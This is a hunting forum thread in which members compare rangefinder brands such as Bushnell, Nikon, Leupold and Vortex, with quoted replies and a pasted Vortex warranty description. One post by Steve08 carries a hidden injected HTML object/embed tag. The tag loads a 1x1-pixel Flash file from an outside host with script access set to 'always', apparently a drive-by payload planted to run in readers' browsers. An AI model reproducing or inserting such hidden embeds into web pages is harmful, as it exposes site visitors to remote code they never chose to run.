What type?

ErikGibb

Looking at buying a new rangefinder. I've had a bushnell for years but finally gave up on me. What type/brand do you guys use?

Hunter922

Have 1 Nikon and 1 Vortex.. Both are very good..

Jim Boyd

Entry level Leupold.

Very happy with it.

Think it is 4-5 years old.

Good luck!

BlackEagle

Banned
Bushnell still running strong and this is year 9

If I ever have to get another one....it will be a bushnell.

beersndeer

I have a Bushnell that I am using now. Before I had an old Nikon that served me very well. Stay away from the Wild Game and Simmons brand.

pasinthrough

I had a Leupold RX2. Served me well. It wouldn't range through a glass window or door and seemed to do ok otherwise.

I just got a Leupold RX1200i. Very solid unit. It will range through my glass door and through my screen porch and still give me the correct distance. Very bright OLED display with enough options to be handy but not too confusing.

My old RX2 was about 7 years old and I only replaced the battery once and that was before a big hunt in 2012, not because it needed it.

Anxious to see how the RX1200 does, but so far, I like it. If you shoot any 3D, leupold does the best on the black targets imo.

watermedic

I had a Leupold RX2. Served me well. It wouldn't range through a glass window or door and seemed to do ok otherwise.

I just got a Leupold RX1200i. Very solid unit. It will range through my glass door and through my screen porch and still give me the correct distance. Very bright OLED display with enough options to be handy but not too confusing.

My old RX2 was about 7 years old and I only replaced the battery once and that was before a big hunt in 2012, not because it needed it.

Anxious to see how the RX1200 does, but so far, I like it. If you shoot any 3D, leupold does the best on the black targets imo.

Absolutely!!

01Foreman400

Staff member
I've got a Vortex Ranger 1000. The warranty is what made me choose it over other brands.

Our VIP warranty is about you, not us. It's about taking care of you after the sale.

VIP stands for a Very Important Promise to you, our customer. We will repair or replace your Vortex product in the event it becomes damaged or defective—at no charge to you. If we cannot repair your product, we will replace it with a product in perfect working order of equal or better physical condition.

You see, it doesn't matter how it happened, whose fault it was, or where you purchased it. You can count on the VIP Warranty for all Vortex Optics riflescopes, prism scopes, red dots, rangefinders, binoculars, spotting scopes, tripods, and monoculars.
•Unlimited Lifetime Warranty
•Fully transferable
•No warranty card to fill out
•No receipt needed to hang on to

If you ever have a problem, no matter the cause, we promise to take care of you.

Steve08

Had good luck with nikon<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
+1 for Nikon. No problems at all...

uturn

Wish I could remember how old my Bushnell Arc 1000 is...gotta be 7-8 or so and has served me well on like 3 batteries to boot!

Lotta good ones out there tho!

rjcruiser

I just got a Leupold RX1200i. Very solid unit. It will range through my glass door and through my screen porch and still give me the correct distance.

Crazy...how does it manage to go through glass and screen doors?:huh:

First rangefinder I had was an older Bushnell 450 sport. Worked well, then upgraded to an older Leupold RX-i that I bought used. It served me well for about 5 years and seemed to do a little better on objects farther away. Then, I found a deal on a refurbed Bushnell this spring that I couldn't pass up...so, I sold my Leupold and went for the Bushnell.

The Bushnell that I have now has the arc adjustment which is nice...but not a necessary feature. I use it more for golf than for archery.

The only thing that I think I'd like on a rangefinder (and some of the more expensive may have this option) is the LED display turn white or light up against a dark background. Ranging objects at first light or late evening can be difficult with the black numbers.

pasinthrough

Crazy...how does it manage to go through glass and screen doors?:huh:

First rangefinder I had was an older Bushnell 450 sport. Worked well, then upgraded to an older Leupold RX-i that I bought used. It served me well for about 5 years and seemed to do a little better on objects farther away. Then, I found a deal on a refurbed Bushnell this spring that I couldn't pass up...so, I sold my Leupold and went for the Bushnell.

The Bushnell that I have now has the arc adjustment which is nice...but not a necessary feature. I use it more for golf than for archery.

The only thing that I think I'd like on a rangefinder (and some of the more expensive may have this option) is the LED display turn white or light up against a dark background. Ranging objects at first light or late evening can be difficult with the black numbers.

Not sure how it reads through that clutter either, but it does. The OLED display is red and you will have no trouble reading it no matter the amount of light available.

rjcruiser

Not sure how it reads through that clutter either, but it does. The OLED display is red and you will have no trouble reading it no matter the amount of light available.

Hmmmm......Red OLED....wonder how much that option costs to get. :D

Brewskis

Nikon is all I've tried, and had no issues. Specifically, the ACULON. More specifically, the camo one. Can't say for sure the black one works as well.

deast1988

I had 3 bushnells fail

Got an original leupold RX and a newer one last year both are still goin strong.